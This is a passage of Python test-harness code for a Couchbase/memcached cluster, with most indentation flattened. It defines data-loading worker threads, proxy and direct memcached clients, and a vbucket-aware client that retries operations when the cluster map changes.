override_vBucketId=-1,
write_only=False,
moxi=True,
collection=None):
inserted_keys_count = 0
rejected_keys_count = 0
log = logger.Logger.get_logger()
threads = MemcachedClientHelper.create_threads(servers,
name,
ram_load_ratio,
number_of_items,
value_size_distribution,
number_of_threads,
override_vBucketId,
write_only,
moxi,
collection=collection)
# we can start them!
for thread in threads:
thread.start()
log.info("waiting for all worker thread to finish their work...")
[thread.join() for thread in threads]
log.info("worker threads are done...")
for thread in threads:
inserted_keys_count += thread.inserted_keys_count()
rejected_keys_count += thread.rejected_keys_count()
msg = "inserted keys count : {0} , rejected keys count : {1}"
log.info(msg.format(inserted_keys_count, rejected_keys_count))
return inserted_keys_count, rejected_keys_count
@staticmethod
def create_value(pattern, size):
return (pattern * (size // len(pattern))) + pattern[0:(size % len(pattern))]
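    # Illustrative examples: the pattern is tiled and then truncated to exactly `size` chars:
    #   >>> MemcachedClientHelper.create_value('ab', 5)
    #   'ababa'
    #   >>> len(MemcachedClientHelper.create_value('*', 1024))
    #   1024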
@staticmethod
    def random_pick(lst):
        if lst:
            if len(lst) > 1:
                return lst[Random().randint(0, len(lst) - 1)]
            return lst[0]
        # empty list: nothing to pick
        return None
@staticmethod
    def direct_client(server, bucket, timeout=30, admin_user='cbadminbucket', admin_pass='password'):
log = logger.Logger.get_logger()
rest = RestConnection(server)
node = None
try:
node = rest.get_nodes_self()
except ValueError as e:
log.info("could not connect to server {0}, will try scanning all nodes".format(server))
if not node:
nodes = rest.get_nodes()
for n in nodes:
if n.ip == server.ip and n.port == server.port:
node = n
if isinstance(server, dict):
log.info("dict:{0}".format(server))
log.info("creating direct client {0}:{1} {2}".format(server["ip"], node.memcached, bucket))
else:
log.info("creating direct client {0}:{1} {2}".format(server.ip, node.memcached, bucket))
RestHelper(rest).vbucket_map_ready(bucket, 60)
vBuckets = RestConnection(server).get_vbuckets(bucket)
if isinstance(server, dict):
client = MemcachedClient(server["ip"], node.memcached, timeout=timeout)
else:
client = MemcachedClient(server.ip, node.memcached, timeout=timeout)
        if vBuckets is not None:
            client.vbucket_count = len(vBuckets)
        else:
            client.vbucket_count = 0
bucket_info = rest.get_bucket(bucket)
        # TODO: raise an exception if bucket_info is missing
cluster_compatibility = rest.check_cluster_compatibility("5.0")
if cluster_compatibility is None:
pre_spock = True
else:
pre_spock = not cluster_compatibility
if pre_spock:
log.info("Atleast 1 of the server is on pre-spock "
"version. Using the old ssl auth to connect to "
"bucket.")
client.sasl_auth_plain(bucket_info.name.encode('ascii'),
bucket_info.saslPassword.encode('ascii'))
else:
if isinstance(bucket, Bucket):
bucket = bucket.name
bucket = bucket.encode('ascii')
client.sasl_auth_plain(admin_user, admin_pass)
client.bucket_select(bucket)
return client
@staticmethod
def proxy_client(server, bucket, timeout=30, force_ascii=False, standalone_moxi_port=None):
# for this bucket on this node what is the proxy ?
rest = RestConnection(server)
log = logger.Logger.get_logger()
bucket_info = rest.get_bucket(bucket)
nodes = bucket_info.nodes
if (TestInputSingleton.input and "ascii" in TestInputSingleton.input.test_params \
and TestInputSingleton.input.test_params["ascii"].lower() == "true")\
or force_ascii:
ascii = True
else:
ascii = False
for node in nodes:
RestHelper(rest).vbucket_map_ready(bucket, 60)
vBuckets = rest.get_vbuckets(bucket)
port_moxi = standalone_moxi_port or node.memcached
if ascii:
log = logger.Logger.get_logger()
log.info("creating ascii client {0}:{1} {2}".format(server.ip, port_moxi, bucket))
client = MemcachedAsciiClient(server.ip, port_moxi, timeout=timeout)
else:
log = logger.Logger.get_logger()
if isinstance(server, dict):
log.info("creating proxy client {0}:{1} {2}".format(server["ip"], port_moxi, bucket))
client = MemcachedClient(server["ip"], port_moxi, timeout=timeout)
else:
log.info("creating proxy client {0}:{1} {2}".format(server.ip, port_moxi, bucket))
client = MemcachedClient(server.ip, port_moxi, timeout=timeout)
client.vbucket_count = len(vBuckets)
if bucket_info.authType == "sasl":
client.sasl_auth_plain(bucket_info.name,
bucket_info.saslPassword)
return client
if isinstance(server, dict):
raise Exception("unable to find {0} in get_nodes()".format(server["ip"]))
else:
raise Exception("unable to find {0} in get_nodes()".format(server.ip))
@staticmethod
def standalone_moxi_client(server, bucket, timeout=30, moxi_port=None):
log = logger.Logger.get_logger()
if isinstance(server, dict):
log.info("creating proxy client {0}:{1} {2}".format(server["ip"], moxi_port, bucket.name))
client = MemcachedClient(server["ip"], moxi_port, timeout=timeout)
else:
log.info("creating proxy client {0}:{1} {2}".format(server.ip, moxi_port, bucket.name))
client = MemcachedClient(server.ip, moxi_port, timeout=timeout)
if bucket.name != 'default' and bucket.authType == "sasl":
client.sasl_auth_plain(bucket.name.encode('ascii'),
bucket.saslPassword.encode('ascii'))
return client
if isinstance(server, dict):
raise Exception("unable to find {0} in get_nodes()".format(server["ip"]))
else:
raise Exception("unable to find {0} in get_nodes()".format(server.ip))
@staticmethod
    def flush_bucket(server, bucket, admin_user='cbadminbucket', admin_pass='password'):
# if memcached throws OOM error try again ?
log = logger.Logger.get_logger()
retry_attempt = 5
while retry_attempt > 0:
client = MemcachedClientHelper.direct_client(server, bucket, admin_user=admin_user, admin_pass=admin_pass)
try:
client.flush()
log.info('flushed bucket {0}...'.format(bucket))
break
except MemcachedError:
retry_attempt -= 1
log.info('flush raised memcached error trying again in 5 seconds...')
time.sleep(5)
finally:
client.close()
return
class MutationThread(threading.Thread):
def run(self, collection=None):
values = DocumentGenerator.make_docs(len(self.keys),
{"name": "user-${prefix}", "payload": "memcached-json-${prefix}-${padding}",
"size": 1024, "seed": self.seed})
client = MemcachedClientHelper.proxy_client(self.serverInfo, self.name)
counter = 0
for value in values:
try:
if self.op == "set":
client.set(self.keys[counter], 0, 0, value, collection=collection)
self._mutated_count += 1
except MemcachedError:
self._rejected_count += 1
self._rejected_keys.append({"key": self.keys[counter], "value": value})
except Exception as e:
self.log.info("unable to mutate {0} due to {1}".format(self.keys[counter], e))
self._rejected_count += 1
self._rejected_keys.append({"key": self.keys[counter], "value": value})
client.close()
client = MemcachedClientHelper.proxy_client(self.serverInfo, self.name)
counter = counter + 1
self.log.info("mutation failed {0} times".format(self._rejected_count))
client.close()
def __init__(self, serverInfo,
keys,
op,
seed,
name='default',
collection=None):
threading.Thread.__init__(self)
self.log = logger.Logger.get_logger()
self.serverInfo = serverInfo
self.name = name
        self.collection = collection
self.keys = keys
self.op = op
self.seed = seed
self._mutated_count = 0
self._rejected_count = 0
self._rejected_keys = []
class ReaderThread(object):
def __init__(self, info, keyset, queue, collection=None):
self.info = info
self.log = logger.Logger.get_logger()
self.error_seen = 0
self.keyset = keyset
self.aborted = False
self.queue = queue
        self.collection = collection
def abort(self):
self.aborted = True
def _saw_error(self, key):
# error_msg = "unable to get key {0}"
self.error_seen += 1
# if self.error_seen < 500:
# self.log.error(error_msg.format(key))
def start(self):
client = MemcachedClientHelper.direct_client(self.info["server"], self.info['name'], admin_user='cbadminbucket',
admin_pass='password')
time.sleep(5)
while self.queue.empty() and self.keyset:
selected = MemcachedClientHelper.random_pick(self.keyset)
selected['how_many'] -= 1
if selected['how_many'] < 1:
self.keyset.remove(selected)
key = "{0}-{1}-{2}".format(self.info['baseuuid'],
selected['size'],
int(selected['how_many']))
try:
client.send_get(key, self.collection)
except Exception:
self._saw_error(key)
# self.log.warning("attempted to get {0} keys before they are set".format(self.error_seen))
client.close()
    # mutation ? let's do two cycles: first run, then try to mutate all those items
    # and return
class WorkerThread(threading.Thread):
    # two flags: stop after x errors
    # slow down after every y errors seen
# value_list is a list of document generators
def __init__(self,
serverInfo,
name,
values_list,
ignore_how_many_errors=5000,
override_vBucketId=-1,
terminate_in_minutes=120,
write_only=False,
moxi=True,
async_write=False,
delete_ratio=0,
expiry_ratio=0,
collection=None):
threading.Thread.__init__(self)
self.log = logger.Logger.get_logger()
self.serverInfo = serverInfo
self.name = name
        self.collection = collection
self.values_list = []
self.values_list.extend(copy.deepcopy(values_list))
self._value_list_copy = []
self._value_list_copy.extend(copy.deepcopy(values_list))
self._inserted_keys_count = 0
self._rejected_keys = []
self._rejected_keys_count = 0
self._delete_ratio = delete_ratio
self._expiry_ratio = expiry_ratio
self._delete_count = 0
self._expiry_count = 0
self._delete = []
self.ignore_how_many_errors = ignore_how_many_errors
self.override_vBucketId = override_vBucketId
self.terminate_in_minutes = terminate_in_minutes
self._base_uuid = uuid.uuid4()
self.queue = Queue()
self.moxi = moxi
# let's create a read_thread
self.info = {'server': serverInfo,
'name': self.name,
'baseuuid': self._base_uuid,
'collection': self.collection}
self.write_only = write_only
self.aborted = False
self.async_write = async_write
def inserted_keys_count(self):
return self._inserted_keys_count
def rejected_keys_count(self):
return self._rejected_keys_count
    # smart function that gives you something you can use to
    # get inserted keys
    # we should just expose an iterator instead which
    # generates the key/values on the fly
def keys_set(self):
# let's construct the inserted keys set
        # TODO: hard limit, only populate up to ~2 million keys
inserted_keys = []
for item in self._value_list_copy:
for i in range(0, (int(item['how_many']))):
key = "{0}-{1}-{2}".format(self._base_uuid, item['size'], i)
if key not in self._rejected_keys:
inserted_keys.append(key)
if len(inserted_keys) > 2 * 1024 * 1024:
break
return inserted_keys, self._rejected_keys
def run(self):
msg = "starting a thread to set keys mixed set-get ? {0} and using async_set ? {1}"
msg += " with moxi ? {2}"
msg = msg.format(self.write_only, self.async_write, self.moxi)
self.log.info(msg)
try:
awareness = VBucketAwareMemcached(RestConnection(self.serverInfo), self.name)
client = None
if self.moxi:
client = MemcachedClientHelper.proxy_client(self.serverInfo, self.name)
except Exception as ex:
self.log.info("unable to create memcached client due to {0}. stop thread...".format(ex))
import traceback
traceback.print_exc()
return
        # keeping keys in memory is not such a good idea because we would run out of memory,
        # so it is best to just keep a counter. if someone asks for the keys we can give them
        # the formula, which is baseuuid-{size}-{counter} (counter runs from n down to 0),
        # except for those keys which were rejected
        # let's periodically print out some status
if not self.write_only:
self.reader = Process(target=start_reader_process, args=(self.info, self._value_list_copy, self.queue))
self.reader.start()
start_time = time.time()
last_reported = start_time
backoff_count = 0
while len(self.values_list) > 0 and not self.aborted:
selected = MemcachedClientHelper.random_pick(self.values_list)
selected['how_many'] -= 1
if selected['how_many'] < 1:
self.values_list.remove(selected)
if (time.time() - start_time) > self.terminate_in_minutes * 60:
self.log.info("its been more than {0} minutes loading data. stopping the process..".format(
self.terminate_in_minutes))
break
else:
# every two minutes print the status
if time.time() - last_reported > 2 * 60:
if not self.moxi:
awareness.done()
try:
awareness = VBucketAwareMemcached(RestConnection(self.serverInfo), self.name)
except Exception:
# vbucket map is changing . sleep 5 seconds
time.sleep(5)
awareness = VBucketAwareMemcached(RestConnection(self.serverInfo), self.name)
self.log.info("now connected to {0} memcacheds".format(len(awareness.memcacheds)))
last_reported = time.time()
for item in self.values_list:
self.log.info(
'{0} keys (each {1} bytes) more to send...'.format(item['how_many'], item['size']))
key = "{0}-{1}-{2}".format(self._base_uuid,
selected['size'],
int(selected['how_many']))
if not self.moxi:
client = awareness.memcached(key)
if not client:
self.log.error("client should not be null")
value = "*"
try:
value = next(selected["value"])
except StopIteration:
pass
try:
if self.override_vBucketId >= 0:
client.vbucketId = self.override_vBucketId
if self.async_write:
client.send_set(key, 0, 0, value, self.collection)
else:
client.set(key, 0, 0, value, self.collection)
self._inserted_keys_count += 1
backoff_count = 0
# do expiry sets, 30 second expiry time
if Random().random() < self._expiry_ratio:
client.set(key + "-exp", 30, 0, value, self.collection)
self._expiry_count += 1
# do deletes if we have 100 pending
# at the end delete the remaining
if len(self._delete) >= 100:
# self.log.info("deleting {0} keys".format(len(self._delete)))
for key_del in self._delete:
client.delete(key_del, self.collection)
self._delete = []
# do delete sets
if Random().random() < self._delete_ratio:
client.set(key + "-del", 0, 0, value, self.collection)
self._delete.append(key + "-del")
self._delete_count += 1
except MemcachedError as error:
if not self.moxi:
awareness.done()
try:
awareness = VBucketAwareMemcached(RestConnection(self.serverInfo), self.name)
except Exception:
# vbucket map is changing . sleep 5 seconds
time.sleep(5)
awareness = VBucketAwareMemcached(RestConnection(self.serverInfo), self.name)
self.log.info("now connected to {0} memcacheds".format(len(awareness.memcacheds)))
if isinstance(self.serverInfo, dict):
self.log.error(
"memcached error {0} {1} from {2}".format(error.status, error.msg, self.serverInfo["ip"]))
else:
self.log.error(
"memcached error {0} {1} from {2}".format(error.status, error.msg, self.serverInfo.ip))
if error.status == 134:
backoff_count += 1
if backoff_count < 5:
backoff_seconds = 15 * backoff_count
else:
backoff_seconds = 2 * backoff_count
self.log.info("received error # 134. backing off for {0} sec".format(backoff_seconds))
time.sleep(backoff_seconds)
self._rejected_keys_count += 1
self._rejected_keys.append({"key": key, "value": value})
if len(self._rejected_keys) > self.ignore_how_many_errors:
break
except Exception as ex:
if not self.moxi:
awareness.done()
try:
awareness = VBucketAwareMemcached(RestConnection(self.serverInfo), self.name)
except Exception:
awareness = VBucketAwareMemcached(RestConnection(self.serverInfo), self.name)
self.log.info("now connected to {0} memcacheds".format(len(awareness.memcacheds)))
if isinstance(self.serverInfo, dict):
self.log.error("error {0} from {1}".format(ex, self.serverInfo["ip"]))
import traceback
traceback.print_exc()
else:
self.log.error("error {0} from {1}".format(ex, self.serverInfo.ip))
self._rejected_keys_count += 1
self._rejected_keys.append({"key": key, "value": value})
if len(self._rejected_keys) > self.ignore_how_many_errors:
break
# before closing the session let's try sending those items again
retry = 3
while retry > 0 and self._rejected_keys_count > 0:
rejected_after_retry = []
self._rejected_keys_count = 0
for item in self._rejected_keys:
try:
if self.override_vBucketId >= 0:
client.vbucketId = self.override_vBucketId
if self.async_write:
client.send_set(item["key"], 0, 0, item["value"], self.collection)
else:
client.set(item["key"], 0, 0, item["value"], self.collection)
self._inserted_keys_count += 1
except MemcachedError:
self._rejected_keys_count += 1
rejected_after_retry.append({"key": item["key"], "value": item["value"]})
if len(rejected_after_retry) > self.ignore_how_many_errors:
break
self._rejected_keys = rejected_after_retry
            retry -= 1
# clean up the rest of the deleted keys
if len(self._delete) > 0:
# self.log.info("deleting {0} keys".format(len(self._delete)))
for key_del in self._delete:
client.delete(key_del, self.collection)
self._delete = []
self.log.info("deleted {0} keys".format(self._delete_count))
self.log.info("expiry {0} keys".format(self._expiry_count))
# client.close()
awareness.done()
if not self.write_only:
self.queue.put_nowait("stop")
self.reader.join()
def _initialize_memcached(self):
pass
def _set(self):
pass
def _handle_error(self):
pass
# if error is memcached error oom related let's do a sleep
def _time_to_stop(self):
return self.aborted or len(self._rejected_keys) > self.ignore_how_many_errors
class VBucketAwareMemcached(object):
def __init__(self, rest, bucket, info=None, collection=None):
self.log = logger.Logger.get_logger()
self.info = info
self.bucket = bucket
if isinstance(bucket, Bucket):
self.bucket = bucket.name
self.memcacheds = {}
self.vBucketMap = {}
self.vBucketMapReplica = {}
self.rest = rest
self.reset(rest)
        self.collections = collection
def reset(self, rest=None):
if not rest:
self.rest = RestConnection(self.info)
m, v, r = self.request_map(self.rest, self.bucket)
self.memcacheds = m
self.vBucketMap = v
self.vBucketMapReplica = r
    def reset_vbuckets(self, rest, vbucketids_set, forward_map=None, admin_user='cbadminbucket', admin_pass='password'):
if not forward_map:
forward_map = rest.get_bucket(self.bucket, num_attempt=2).forward_map
if not forward_map:
self.reset(rest)
forward_map = rest.get_vbuckets(self.bucket)
nodes = rest.get_nodes()
for vBucket in forward_map:
if vBucket.id in vbucketids_set:
self.vBucketMap[vBucket.id] = vBucket.master
masterIp = vBucket.master.rsplit(":", 1)[0]
masterPort = int(vBucket.master.rsplit(":", 1)[1])
if self.vBucketMap[vBucket.id] not in self.memcacheds:
server = TestInputServer()
server.rest_username = rest.username
server.rest_password = rest.password
for node in nodes:
if node.ip == masterIp and node.memcached == masterPort:
server.port = node.port
server.ip = masterIp
self.log.info("Received forward map, reset vbucket map, new direct_client")
self.memcacheds[vBucket.master] = MemcachedClientHelper.direct_client(server, self.bucket,
admin_user=admin_user, admin_pass=admin_pass)
# if no one is using that memcached connection anymore just close the connection
used_nodes = {self.vBucketMap[vb_name] for vb_name in self.vBucketMap}
rm_clients = []
for memcache_con in self.memcacheds:
if memcache_con not in used_nodes:
rm_clients.append(memcache_con)
for rm_cl in rm_clients:
self.memcacheds[rm_cl].close()
del self.memcacheds[rm_cl]
self.vBucketMapReplica[vBucket.id] = vBucket.replica
for replica in vBucket.replica:
self.add_memcached(replica, self.memcacheds, self.rest, self.bucket)
return True
def request_map(self, rest, bucket):
memcacheds = {}
vBucketMap = {}
vBucketMapReplica = {}
vb_ready = RestHelper(rest).vbucket_map_ready(bucket, 60)
if not vb_ready:
raise Exception("vbucket map is not ready for bucket {0}".format(bucket))
vBuckets = rest.get_vbuckets(bucket)
for vBucket in vBuckets:
vBucketMap[vBucket.id] = vBucket.master
self.add_memcached(vBucket.master, memcacheds, rest, bucket)
vBucketMapReplica[vBucket.id] = vBucket.replica
for replica in vBucket.replica:
self.add_memcached(replica, memcacheds, rest, bucket)
return memcacheds, vBucketMap, vBucketMapReplica
def add_memcached(self, server_str, memcacheds, rest, bucket, admin_user='cbadminbucket', admin_pass='password'):
        if server_str not in memcacheds:
serverIp = server_str.rsplit(":", 1)[0]
serverPort = int(server_str.rsplit(":", 1)[1])
nodes = rest.get_nodes()
server = TestInputServer()
server.ip = serverIp
self.log.info("add_memcached: server ={}:{}".format(serverIp, serverPort))
            servers_map = TestInputSingleton.input.param("servers_map", "")
if servers_map:
log.info("servers_map={}".format(servers_map))
servers_ip_host = servers_map.split(",")
for server_ip_host in servers_ip_host:
ip_host = server_ip_host.split(":")
mapped_ip = ip_host[0]
mapped_host = ip_host[1]
if mapped_ip in server.ip:
log.info("--> replacing ip with hostname ")
server.ip = mapped_host
if TestInputSingleton.input.param("alt_addr", False):
server.ip = rest.get_ip_from_ini_file()
server.port = rest.port
server.rest_username = rest.username
server.rest_password = rest.password
try:
for node in nodes:
if node.ip == serverIp and node.memcached == serverPort:
if server_str not in memcacheds:
#server.port = node.port
if TestInputSingleton.input.param("is_secure", False):
server.port = server_ports.ssl_rest_port
else:
                                server.port = node.port
memcacheds[server_str] = \
MemcachedClientHelper.direct_client(server, bucket, admin_user=admin_user,
admin_pass=admin_pass)
#self.enable_collection(memcacheds[server_str])
break
except Exception as ex:
msg = "unable to establish connection to {0}. cleanup open connections"
self.log.warning(msg.format(serverIp))
self.done()
raise ex
def memcached(self, key, replica_index=None):
vBucketId = self._get_vBucket_id(key)
if replica_index is None:
return self.memcached_for_vbucket(vBucketId)
else:
return self.memcached_for_replica_vbucket(vBucketId, replica_index)
def memcached_for_vbucket(self, vBucketId):
if vBucketId not in self.vBucketMap:
msg = "vbucket map does not have an entry for vb : {0}"
raise Exception(msg.format(vBucketId))
if self.vBucketMap[vBucketId] not in self.memcacheds:
msg = "moxi does not have a mc connection for server : {0}"
raise Exception(msg.format(self.vBucketMap[vBucketId]))
return self.memcacheds[self.vBucketMap[vBucketId]]
def memcached_for_replica_vbucket(self, vBucketId, replica_index=0, log_on = False):
if vBucketId not in self.vBucketMapReplica:
msg = "replica vbucket map does not have an entry for vb : {0}"
raise Exception(msg.format(vBucketId))
if log_on:
self.log.info("replica vbucket: vBucketId {0}, server{1}".format(vBucketId, self.vBucketMapReplica[vBucketId][replica_index]))
if self.vBucketMapReplica[vBucketId][replica_index] not in self.memcacheds:
msg = "moxi does not have a mc connection for server : {0}"
raise Exception(msg.format(self.vBucketMapReplica[vBucketId][replica_index]))
return self.memcacheds[self.vBucketMapReplica[vBucketId][replica_index]]
def not_my_vbucket_memcached(self, key, collection=None):
vBucketId = self._get_vBucket_id(key)
which_mc = self.vBucketMap[vBucketId]
for server in self.memcacheds:
if server != which_mc:
return self.memcacheds[server]
# DECORATOR
def aware_call(func):
def new_func(self, key, *args, **keyargs):
vb_error = 0
while True:
try:
return func(self, key, *args, **keyargs)
except MemcachedError as error:
if error.status == ERR_NOT_MY_VBUCKET and vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)},
forward_map=self._parse_not_my_vbucket_error(error))
vb_error += 1
else:
raise error
except (EOFError, socket.error) as error:
if "Got empty data (remote died?)" in str(error) or \
"Timeout waiting for socket" in str(error) or \
"Broken pipe" in str(error) or "Connection reset by peer" in str(error) \
and vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)})
vb_error += 1
else:
raise error
except BaseException as error:
if vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)})
vb_error += 1
else:
raise error
return new_func
# SUBDOCS
@aware_call
def counter_sd(self, key, path, value, expiry=0, opaque=0, cas=0, create=False, collection=None):
return self._send_op(self.memcached(key).counter_sd, key, path, value, expiry=expiry, opaque=opaque, cas=cas, create=create, collection=collection)
@aware_call
def array_add_insert_sd(self, key, path, value, expiry=0, opaque=0, cas=0, create=False, collection=None):
return self._send_op(self.memcached(key).array_add_insert_sd, key, path, value, expiry=expiry, opaque=opaque, cas=cas, create=create, collection=collection)
@aware_call
def array_add_unique_sd(self, key, path, value, expiry=0, opaque=0, cas=0, create=False, collection=None):
return self._send_op(self.memcached(key).array_add_unique_sd, key, path, value, expiry=expiry, opaque=opaque, cas=cas, create=create, collection=collection)
@aware_call
def array_push_first_sd(self, key, path, value, expiry=0, opaque=0, cas=0, create=False, collection=None):
return self._send_op(self.memcached(key).array_push_first_sd, key, path, value, expiry=expiry, opaque=opaque, cas=cas, create=create, collection=collection)
@aware_call
def array_push_last_sd(self, key, path, value, expiry=0, opaque=0, cas=0, create=False, collection=None):
return self._send_op(self.memcached(key).array_push_last_sd, key, path, value, expiry=expiry, opaque=opaque, cas=cas, create=create, collection=collection)
@aware_call
def replace_sd(self, key, path, value, expiry=0, opaque=0, cas=0, create=False, collection=None):
return self._send_op(self.memcached(key).replace_sd, key, path, value, expiry=expiry, opaque=opaque, cas=cas, create=create, collection=collection)
@aware_call
def delete_sd(self, key, path, opaque=0, cas=0, collection=None):
return self._send_op(self.memcached(key).delete_sd, key, path, opaque=opaque, cas=cas, collection=collection)
@aware_call
def dict_upsert_sd(self, key, path, value, expiry=0, opaque=0, cas=0, create=False, collection=None):
return self._send_op(self.memcached(key).dict_upsert_sd, key, path, value, expiry=expiry, opaque=opaque, cas=cas, create=create, collection=collection)
@aware_call
def dict_add_sd(self, key, path, value, expiry=0, opaque=0, cas=0, create=False, collection=None):
return self._send_op(self.memcached(key).dict_add_sd, key, path, value, expiry=expiry, opaque=opaque, cas=cas, create=create, collection=collection)
@aware_call
def exists_sd(self, key, path, cas=0, collection=None):
return self._send_op(self.memcached(key).exists_sd, key, path, cas=cas, collection=collection)
@aware_call
def get_sd(self, key, path, cas=0, collection=None):
return self._send_op(self.memcached(key).get_sd, key, path, cas=cas, collection=collection)
@aware_call
def set(self, key, exp, flags, value, collection=None):
return self._send_op(self.memcached(key).set, key, exp, flags, value, collection=collection)
@aware_call
def append(self, key, value, collection=None):
return self._send_op(self.memcached(key).append, key, value, collection=collection)
@aware_call
def observe(self, key, collection=None):
return self._send_op(self.memcached(key).observe, key, collection=collection)
@aware_call
def observe_seqno(self, key, vbucket_uuid, collection=None):
return self._send_op(self.memcached(key).observe_seqno, key, vbucket_uuid, collection=collection)
# This saves a lot of repeated code - the func is the mc bin client function
def generic_request(self, func, *args):
key = args[0]
vb_error = 0
while True:
try:
return self._send_op(func, *args)
except MemcachedError as error:
if error.status == ERR_NOT_MY_VBUCKET and vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)},
forward_map=self._parse_not_my_vbucket_error(error))
vb_error += 1
else:
raise error
except (EOFError, socket.error) as error:
if "Got empty data (remote died?)" in str(error) or \
"Timeout waiting for socket" in str(error) or \
"Broken pipe" in str(error) or "Connection reset by peer" in str(error) \
and vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)})
vb_error += 1
if vb_error >= 5:
raise error
else:
raise error
except BaseException as error:
if vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)})
self.log.info("***************resetting vbucket id***********")
vb_error += 1
else:
raise error
def get(self, key, collection=None):
vb_error = 0
while True:
try:
return self._send_op(self.memcached(key).get, key, collection=collection)
except MemcachedError as error:
if error.status == ERR_NOT_MY_VBUCKET and vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)},
forward_map=self._parse_not_my_vbucket_error(error))
vb_error += 1
else:
raise error
except (EOFError, socket.error) as error:
if "Got empty data (remote died?)" in str(error) or \
"Timeout waiting for socket" in str(error) or\
"Broken pipe" in str(error) or "Connection reset by peer" in str(error) \
and vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)})
vb_error += 1
else:
raise error
except BaseException as error:
if vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)})
vb_error += 1
else:
raise error
def getr(self, key, replica_index=0, collection=None):
vb_error = 0
while True:
try:
vBucketId = self._get_vBucket_id(key)
return self._send_op(self.memcached(key, replica_index=replica_index).getr, key, collection=collection)
except MemcachedError as error:
if error.status == ERR_NOT_MY_VBUCKET and vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)},
forward_map=self._parse_not_my_vbucket_error(error))
vb_error += 1
else:
raise error
except (EOFError, socket.error) as error:
if "Got empty data (remote died?)" in str(error) or \
"Timeout waiting for socket" in str(error) or\
"Broken pipe" in str(error) or "Connection reset by peer" in str(error) \
and vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)})
vb_error += 1
else:
raise error
except BaseException as error:
if vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)})
vb_error += 1
else:
raise error
def setMulti(self, exp, flags, key_val_dic, pause_sec=1, timeout_sec=5, parallel=False, collection=None):
if parallel:
try:
import concurrent.futures
self._setMulti_parallel(exp, flags, key_val_dic, pause_sec, timeout_sec, collection=collection)
except ImportError:
self._setMulti_seq(exp, flags, key_val_dic, pause_sec, timeout_sec, collection=collection)
else:
self._setMulti_seq(exp, flags, key_val_dic, pause_sec, timeout_sec, collection=collection)
def _setMulti_seq(self, exp, flags, key_val_dic, pause_sec=1, timeout_sec=5, collection=None):
# set keys in their respective vbuckets and identify the server for each vBucketId
server_keyval = self._get_server_keyval_dic(key_val_dic)
# get memcached client against each server and multi set
for server_str, keyval in list(server_keyval.items()):
#if the server has been removed after server_keyval has been gotten
if server_str not in self.memcacheds:
self._setMulti_seq(exp, flags, key_val_dic, pause_sec, timeout_sec, collection=collection)
else:
mc = self.memcacheds[server_str]
errors = self._setMulti_rec(mc, exp, flags, keyval, pause_sec,
timeout_sec, self._setMulti_seq, collection=collection)
if errors:
self.log.error(list(set(str(error) for error in errors)), exc_info=1)
raise errors[0]
def _setMulti_parallel(self, exp, flags, key_val_dic, pause_sec=1, timeout_sec=5, collection=None):
# set keys in their respective vbuckets and identify the server for each vBucketId
server_keyval = self._get_server_keyval_dic(key_val_dic)
# get memcached client against each server and multi set
tasks = []
import concurrent.futures
with concurrent.futures.ThreadPoolExecutor(max_workers=len(server_keyval)) as executor:
for server_str, keyval in list(server_keyval.items()) :
mc = self.memcacheds[server_str]
                tasks.append(executor.submit(self._setMulti_rec, mc, exp, flags, keyval, pause_sec, timeout_sec, self._setMulti_parallel, collection=collection))
errors = []
now = time.time()
for future in concurrent.futures.as_completed(tasks, timeout_sec):
if future.exception() is not None:
self.log.error("exception in {0} sec".format(time.time() - now))
raise future.exception()
errors.extend(future.result())
if errors:
self.log.error(list(set(str(error) for error in errors)), exc_info=1)
raise errors[0]
def enable_collection(self, memcached_client,bucket="default"):
memcached_client.bucket_select(bucket)
memcached_client.enable_collections()
memcached_client.hello(memcacheConstants.FEATURE_COLLECTIONS)
memcached_client.get_collections(True)
def _setMulti_rec(self, memcached_client, exp, flags, keyval, pause, timeout, rec_caller_fn, collection=None):
try:
if collection:
self.enable_collection(memcached_client)
errors = memcached_client.setMulti(exp, flags, keyval, collection=collection)
if not errors:
return []
elif timeout <= 0:
return errors
else:
time.sleep(pause)
self.reset_vbuckets(self.rest, self._get_vBucket_ids(list(keyval.keys())))
try:
rec_caller_fn(exp, flags, keyval, pause, timeout - pause, collection=collection) # Start all over again for these key vals.
except MemcachedError as error:
if error.status == ERR_2BIG:
self.log.info("<MemcachedError #%d ``%s''>" % (error.status, error.msg))
return []
else:
return [error]
return [] # Note: If used for async,too many recursive threads could get spawn here.
except (EOFError, socket.error) as error:
try:
if "Got empty data (remote died?)" in str(error) or \
"Timeout waiting for socket" in str(error) or \
"Broken pipe" in str(error) or \
"Connection reset by peer" in str(error)\
and timeout > 0:
time.sleep(pause)
self.reset_vbuckets(self.rest, self._get_vBucket_ids(list(keyval.keys())))
                    rec_caller_fn(exp, flags, keyval, pause, timeout - pause, collection=collection)
return []
else:
return [error]
except AttributeError:
# noinspection PyPackageRequirements
if "Got empty data (remote died?)" in str(error) or \
"Timeout waiting for socket" in str(error) or \
"Broken pipe" in str(error) or \
"Connection reset by peer" in str(error)\
and timeout > 0:
time.sleep(pause)
self.reset_vbuckets(self.rest, self._get_vBucket_ids(list(keyval.keys())))
                    rec_caller_fn(exp, flags, keyval, pause, timeout - pause, collection=collection)
return []
else:
return [error]
except BaseException as error:
if timeout <= 0:
return [error]
else:
time.sleep(pause)
self.reset_vbuckets(self.rest, self._get_vBucket_ids(list(keyval.keys())))
rec_caller_fn(exp, flags, keyval, pause, timeout - pause, collection=collection) # Please refer above for comments.
return []
def _get_server_keyval_dic(self, key_val_dic):
server_keyval = {}
for key, val in list(key_val_dic.items()):
vBucketId = self._get_vBucket_id(key)
server_str = self.vBucketMap[vBucketId]
if server_str not in server_keyval :
server_keyval[server_str] = {}
server_keyval[server_str][key] = val
return server_keyval
def getMulti(self, keys_lst, pause_sec=1, timeout_sec=5, parallel=True,collection=None):
if parallel:
try:
import concurrent.futures
